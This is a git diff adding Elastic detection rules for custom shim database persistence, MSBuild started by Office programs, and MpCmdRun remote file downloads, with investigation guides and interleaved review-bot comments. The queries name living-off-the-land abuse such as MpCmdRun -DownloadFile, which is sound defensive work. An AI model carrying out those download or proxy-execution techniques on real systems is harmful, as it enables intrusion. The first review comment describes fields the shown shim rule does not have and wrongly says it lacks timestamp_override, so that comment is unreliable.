"id": "c5c9f591-d111-4cf8-baec-c26a39bc31ef_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_107.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_107.json new file mode 100644 index 00000000000..88108809ede --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_107.json 
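Review bot: This rule has no `timestamp_override`, whereas every other rule in this commit sets `"timestamp_override": "event.ingested"`; for a `maxspan=1m` sequence over Sysmon image-load events, late-arriving documents are then evaluated on `@timestamp` and can fall outside the `now-9m` lookback. If the omission is deliberate (for instance because the rule only targets `winlogbeat-*` and Sysmon indices where `event.ingested` may be absent), a sentence in `setup` saying so would stop the next maintainer from "fixing" it. The hard-coded `file.pe.imphash` value is likewise tied to one COMSVCS.DLL build; the `file.pe.original_file_name` alternative covers other builds, but a short note in `setup` on why the imphash is pinned would make that intent explicit.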
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Custom Shim Databases", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\*.sdb\" and \n not process.executable : \n (\"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\swrepository\\\\1\\\\swuploads\\\\SAP-SLC\\\\SAPSetupSLC02_14-80001954\\\\Setup\\\\NwSapSetup.exe\", \n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupPlatform.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SAPsetup\\\\setup\\\\NwSapSetup.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SapSetup\\\\OnRebootSvc\\\\NWSAPSetupOnRebootInstSvc.exe\", \n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\Kaspersky Security for Windows Server\\\\kavfs.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: 
Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_108.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_108.json new file mode 100644 index 00000000000..66f3d252d1c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_108.json 
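Review bot: `registry.path` in `query` matches only the `HKLM\\SOFTWARE\\...\\AppCompatFlags\\Custom\\*.sdb` spelling, while the RDP shadowing rule c57f8579 in this same commit lists both the `HKLM\\...` and `\\REGISTRY\\MACHINE\\...` forms of its key; if any of the three indices here (`winlogbeat-*`, Sysmon, Elastic Defend) emits the `\\REGISTRY\\MACHINE` form, those `.sdb` installations are missed. Adding the second spelling as another element of the `registry.path` list keeps the two rules consistent. The same applies to the _108 hunk that follows, which only tightens the endpoint index pattern to `logs-endpoint.events.registry-*`.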
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Custom Shim Databases", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\*.sdb\" and \n not process.executable : \n (\"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\swrepository\\\\1\\\\swuploads\\\\SAP-SLC\\\\SAPSetupSLC02_14-80001954\\\\Setup\\\\NwSapSetup.exe\", \n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupPlatform.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SAPsetup\\\\setup\\\\NwSapSetup.exe\", \n \"?:\\\\Program Files (x86)\\\\SAP\\\\SapSetup\\\\OnRebootSvc\\\\NWSAPSetupOnRebootInstSvc.exe\", \n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\Kaspersky Security for Windows Server\\\\kavfs.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: 
Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109.json new file mode 100644 index 00000000000..eb9904a12aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Excel or Word. This is unusual behavior for the Build Engine and could have been caused by an Excel or Word document executing a malicious script payload.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. It is quite unusual for this program to be started by an Office application like Word or Excel." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by an Office Application", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Started by an Office Application\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule looks for the `Msbuild.exe` utility spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"eqnedt32.exe\",\n \"excel.exe\",\n \"fltldr.exe\",\n \"msaccess.exe\",\n \"mspub.exe\",\n \"outlook.exe\",\n \"powerpnt.exe\",\n \"winword.exe\" )\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c_109", + "type": "security-rule" +} \ No newline at end of file 
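Review bot: The `index` array of this rule lists `logs-system.security*`, but `related_integrations` only declares the `endpoint` and `windows` packages, whereas the `c6453e73-…_111` rule later in this diff pairs the same `logs-system.security*` pattern with a `{ "package": "system", "version": "^1.6.4" }` entry. If `related_integrations` is what Kibana uses to surface the integrations a rule depends on, this rule will not advertise the System integration even though it is expected to read its security events; presumably this metadata is produced by the upstream rule exporter, so the fix belongs there rather than hand-editing the export. The same omission is carried into the `_110` copy of this rule in the next hunk.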
diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110.json new file mode 100644 index 00000000000..7a0084b5127 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Excel or Word. This is unusual behavior for the Build Engine and could have been caused by an Excel or Word document executing a malicious script payload.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. It is quite unusual for this program to be started by an Office application like Word or Excel." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by an Office Application", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Started by an Office Application\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule looks for the `Msbuild.exe` utility spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"eqnedt32.exe\",\n \"excel.exe\",\n \"fltldr.exe\",\n \"msaccess.exe\",\n \"mspub.exe\",\n \"outlook.exe\",\n \"powerpnt.exe\",\n \"winword.exe\" )\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111.json new file mode 100644 index 00000000000..bf2d7c32b42 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via MpCmdRun", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or ?process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", + "references": [ + "https://twitter.com/mohammadaskar2/status/1301263551638761477", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112.json new file mode 100644 index 00000000000..1f0a7c52be3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via MpCmdRun", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
